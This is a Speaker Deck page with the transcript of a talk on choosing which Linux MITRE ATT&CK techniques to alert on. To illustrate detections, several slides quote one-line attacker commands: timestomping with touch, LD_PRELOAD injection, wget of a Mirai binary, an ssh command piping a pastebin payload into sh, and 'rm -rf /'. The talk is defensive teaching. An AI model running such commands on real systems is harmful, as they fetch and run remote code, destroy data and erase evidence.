Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Alertable Techniques for Linux using MITRE ATT&CK

Tony M Lambert
October 29, 2019
Technology
1
2.1k

Alertable Techniques for Linux using MITRE ATT&CK

Community members continually ask, should I have detection capabilities across every technique in ATT&CK? This question inevitably leads to the same conclusion that not every technique is alertable and not all of them provide the same value for immediate detection. In this session we’ll discuss the concept of alertable detections using Linux ATT&CK techniques as a case study. We’ll introduce decision criteria we’ve learned through experience to illustrate the challenges, and we’ll recommend specific techniques that work well with an alert-driven workflow.

Tony M Lambert

October 29, 2019
Tweet

More Decks by Tony M Lambert

See All by Tony M Lambert
The Wild World of macOS Installers
forensicitguy
0
28
Whitelisting LD_PRELOAD For Fun and No Profit
forensicitguy
0
320
Spotting Lateral Movement - BSides Augusta 2019
forensicitguy
1
880
Intelligence Driven Testing with Atomic Red Team
forensicitguy
2
350
Spotting Lateral Movement with Endpoint Data
forensicitguy
2
560

Other Decks in Technology

See All in Technology
ワールドカフェI /チューターを改良する / World Café I and Improving the Tutors
ks91
PRO
0
120
よく聞くけど使ったことないソフトウェアNo.1 KafkaとSnowflake
foursue
4
360
LayerXにおけるLLMプロダクト開発の今までとこれから
layerx
PRO
1
260
APIファーストなプロダクトマネジメントの実践 〜SaaSus Platformでの例〜 / "Practicing API-First Product Management - An Example with SaaSus Platform
oztick139
0
110
FrontDoorとWebAppsを組み合わせた際のリダイレクト処理の注意点
kenichirokimura
1
520
JAWS-UG Bedrock Claude Night
yamahiro
3
610
Meta Quest 3 で動く桜マシマシ WebXR アプリを IBM Cloud Code Engine と Babylon.js で作った話
1ftseabass
PRO
0
120
障害対応をちょっとずつよくしていくための 演習の作りかた
heleeen
0
210
アクセス制御にまつわる改善 / Improving access control
itkq
0
540
エンジニアのキャリアをちょっと楽しくする3本の軸/Three Pillars to Make an Engineer's Career More Enjoyable
kwappa
0
2.7k
web-application-security
matsuihidetoshi
0
170
サーバー間 GraphQL と webmock-graphql の話 / server-to-server graphql and webmock-graphql
qsona
2
190

Featured

See All Featured
The Invisible Side of Design
smashingmag
294
49k
4 Signs Your Business is Dying
shpigford
175
21k
StorybookのUI Testing Handbookを読んだ
zakiyama
13
4.6k
Reflections from 52 weeks, 52 projects
jeffersonlam
345
19k
Why Our Code Smells
bkeepers
PRO
331
56k
Responsive Adventures: Dirty Tricks From The Dark Corners of Front-End
smashingmag
244
20k
Facilitating Awesome Meetings
lara
42
5.6k
Typedesign – Prime Four
hannesfritz
36
2.1k
Product Roadmaps are Hard
iamctodd
44
9.7k
Designing Dashboards & Data Visualisations in Web Apps
destraynor
226
51k
Building a Modern Day 
E-commerce SEO Strategy
aleyda
17
6.4k
Helping Users Find Their Own Way: Creating Modern Search Experiences
danielanewman
20
1.9k

Transcript

  1. Alertable Techniques for Linux Using MITRE ATT&CK™

  2. ▪ Find & detect adversaries using data ▪ Recovering system

    administrator ▪ Love to teach, hate to grade homework Tony Lambert Detection Engineer/Intel Red Canary @ForensicITGuy id -un

  3. ▪ What’s an alertable technique? ▪ Decision criteria for alerting

    ▪ The good, the bad, and the ugly Overview

  4. ▪ Notification of abnormal condition ▪ Requires context for triage

    ▪ Requires care and feeding for efficacy What’s an alert?

  5. Alert Workflow Condition occurs 1 Defender investigates 2 3 4

    Alert fires Escalate or hide

  6. ▪ High volume by default ▪ Lack of context Problems

    with Alerts

  7. Decision Criteria for Alerts ▪ Time to investigate (lower is

    better) ▪ Significance of abnormality (urgent is better) ▪ Time to respond (lower is better)

  8. Alerts that don’t suck

  9. Timestomping (T1099) touch -acmr /bin/sh /file/to/timestomp ▪ Quick to investigate

    ▪ Significant destruction of evidence

  10. Process Injection (T1055) /etc/ld.so.preload LD_PRELOAD=/tmp/evil.so ▪ Quick to respond ▪

    Used by rootkits, affects user tools

  11. Masquerading (T1036) /tmp/kworkerds /dev/shm/kthreadds ▪ Quick to investigate ▪ Signals

    significant abnormality

  12. We can make these work...

  13. Remote File Copy (T1105) curl https://pastebin.com/evilThing wget http://<ip address>/mirai.x86 ▪

    Requires much tuning ▪ Hunt for outliers in command line

  14. Remote Services (T1021) ssh … [email protected] '(curl hxxps://pastebin.com/payload | sh'

    ▪ Tune out deployment tools ▪ Significant for lateral movement

  15. Worst. Alerts. Ever.

  16. Anything Discovery whoami, netstat, ifconfig, etc. ▪ OS noise makes

    high volume ▪ Better for cluster analysis

  17. Sudo (T1169) sudo ./make_sandwich.sh ▪ Long investigations with little return

    ▪ Better for reporting/audits

  18. File Deletion (T1107) rm -rf / ▪ Probably non-functional rule

    ▪ Helpdesk will know before the alert

  19. Alert where possible, report/hunt otherwise REDCANARY.COM/BLOG

  20. Q & A https://github.com/bfuzzy1/auditd-attack https://github.com/Neo23x0/auditd RESOURCES